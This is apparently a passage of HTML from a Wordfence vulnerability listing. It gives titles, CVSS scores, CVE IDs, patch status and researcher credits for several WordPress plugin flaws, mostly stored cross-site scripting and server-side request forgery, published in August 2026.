<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6f0991e-7b0c-455b-a67a-dc3cb16103f3" target="_blank" rel="noopener">Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid &lt;= 1.8.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78290" target="_blank" rel="noopener noreferrer">							CVE-2026-78290						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/magazine-blocks" target="_blank" rel="noopener">Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid</a> <span class="wfvr-software-slug">[magazine-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6f0991e-7b0c-455b-a67a-dc3cb16103f3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/976f1f01-ad5d-413e-a208-ae4b71a61502" target="_blank" rel="noopener">MetForm &lt;= 4.1.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;mf_form_id&#8217; Widget Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18100" target="_blank" rel="noopener noreferrer">							CVE-2026-18100						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metform" target="_blank" rel="noopener">MetForm – Contact Form, Survey, Quiz, Conditional Forms, Form Templates &amp; Custom Form Builder for Elementor</a> <span class="wfvr-software-slug">[metform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/976f1f01-ad5d-413e-a208-ae4b71a61502" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/99772f4b-4152-42dc-8bde-697bba3d031f" target="_blank" rel="noopener">Password Protect WordPress Lite &lt;= 1.9.21 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-9878" target="_blank" rel="noopener noreferrer">							CVE-2025-9878						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-protect-page" target="_blank" rel="noopener">PPWP – Password Protect Pages</a> <span class="wfvr-software-slug">[password-protect-page]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/99772f4b-4152-42dc-8bde-697bba3d031f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/082c7f53-ec14-4235-9a09-9cd0a5312ac2" target="_blank" rel="noopener">Reviews and Rating – Google Reviews &lt;= 5.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Shortcodes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2388" target="_blank" rel="noopener noreferrer">							CVE-2026-2388						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/g-business-reviews-rating" target="_blank" rel="noopener">Reviews and Rating – Google Reviews</a> <span class="wfvr-software-slug">[g-business-reviews-rating]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/082c7f53-ec14-4235-9a09-9cd0a5312ac2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfd45df4-439a-4e46-aba0-a2831c665ea6" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor &lt; 1.7.1066 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19226" target="_blank" rel="noopener noreferrer">							CVE-2026-19226						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfd45df4-439a-4e46-aba0-a2831c665ea6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0296b9ce-22b5-4c00-b57d-9c33c3b100fe" target="_blank" rel="noopener">Shared Files – File Upload &amp; Download Manager &lt;= 1.7.69 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78269" target="_blank" rel="noopener noreferrer">							CVE-2026-78269						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files" target="_blank" rel="noopener">Shared Files – File Upload &amp; Download Manager</a> <span class="wfvr-software-slug">[shared-files]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cem-bas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/218a9b01bda0481cfca44df3b61fa0a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="218a9b01bda0481cfca44df3b61fa0a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cem-bas" target="_blank" rel="noopener">Cem Bas</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0296b9ce-22b5-4c00-b57d-9c33c3b100fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d5c045e2-a6be-425f-a4f3-1e79badf738b" target="_blank" rel="noopener">Smart Slider 3 &lt;= 3.5.1.38 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;slider&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15798" target="_blank" rel="noopener noreferrer">							CVE-2026-15798						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3" target="_blank" rel="noopener">Smart Slider 3</a> <span class="wfvr-software-slug">[smart-slider-3]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d5c045e2-a6be-425f-a4f3-1e79badf738b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/054929b0-af2b-4253-af01-d510a265521c" target="_blank" rel="noopener">SmartAIPress &lt;= 1.2.0 &#8211; Authenticated (Subscriber+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16600" target="_blank" rel="noopener noreferrer">							CVE-2026-16600						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smartaipress" target="_blank" rel="noopener">SmartAIPress</a> <span class="wfvr-software-slug">[smartaipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benjamin-aguayo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/af82254467db515fd38fdb85f781bd46.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="af82254467db515fd38fdb85f781bd46"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benjamin-aguayo" target="_blank" rel="noopener">Benjamin Aguayo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/054929b0-af2b-4253-af01-d510a265521c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b46d23d5-e53a-40ac-ad2e-e3459a208228" target="_blank" rel="noopener">SOGO Add Script to Individual Pages Header Footer &lt;= 3.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14835" target="_blank" rel="noopener noreferrer">							CVE-2026-14835						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/oh-add-script-header-footer" target="_blank" rel="noopener">SOGO Add Script to Individual Pages Header Footer</a> <span class="wfvr-software-slug">[oh-add-script-header-footer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chamseddine-bouzaiene" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bc745b1e2ceadfe5d16db4872cf2c8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc745b1e2ceadfe5d16db4872cf2c8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chamseddine-bouzaiene" target="_blank" rel="noopener">Chamseddine Bouzaiene</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b46d23d5-e53a-40ac-ad2e-e3459a208228" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48ae6e52-4a66-4676-9528-6f997ef54c7a" target="_blank" rel="noopener">tagDiv Composer &lt;= 5.4.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12561" target="_blank" rel="noopener noreferrer">							CVE-2026-12561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/td-composer" target="_blank" rel="noopener">tagDiv Composer</a> <span class="wfvr-software-slug">[td-composer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truoc-phan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d6e0ce93ee91d99b092003f1ffc47ea5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d6e0ce93ee91d99b092003f1ffc47ea5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truoc-phan" target="_blank" rel="noopener">Truoc Phan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48ae6e52-4a66-4676-9528-6f997ef54c7a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b18095-d328-4658-81fc-7b15ca526c18" target="_blank" rel="noopener">TranslatePress &lt;= 3.2.6 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via Approved Comment Body in Translation Editor</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18512" target="_blank" rel="noopener noreferrer">							CVE-2026-18512						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b18095-d328-4658-81fc-7b15ca526c18" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7961bcc-eae7-40e1-8838-9755c7655500" target="_blank" rel="noopener">Ultimate Member &lt;= 2.12.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via Textarea Profile Field with HTML Support (DOM Gadget via id Attribute)</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18547" target="_blank" rel="noopener noreferrer">							CVE-2026-18547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-member" target="_blank" rel="noopener">Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin</a> <span class="wfvr-software-slug">[ultimate-member]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiborisaak" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3aaf07d3bb58c6890b089f9ff6d2734d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3aaf07d3bb58c6890b089f9ff6d2734d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiborisaak" target="_blank" rel="noopener">tiborisaak</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7961bcc-eae7-40e1-8838-9755c7655500" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e746509-4932-4f58-9d56-3a6596418d20" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor &lt; 4.0.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76546" target="_blank" rel="noopener noreferrer">							CVE-2026-76546						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</a> <span class="wfvr-software-slug">[profile-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e746509-4932-4f58-9d56-3a6596418d20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20f0058b-ccc2-45e7-bce1-8f5debefc3aa" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia 9.0 &#8211; 9.7 &#8211; Authenticated (Provider+) Arbitrary Provider Password Update</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14212" target="_blank" rel="noopener noreferrer">							CVE-2026-14212						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
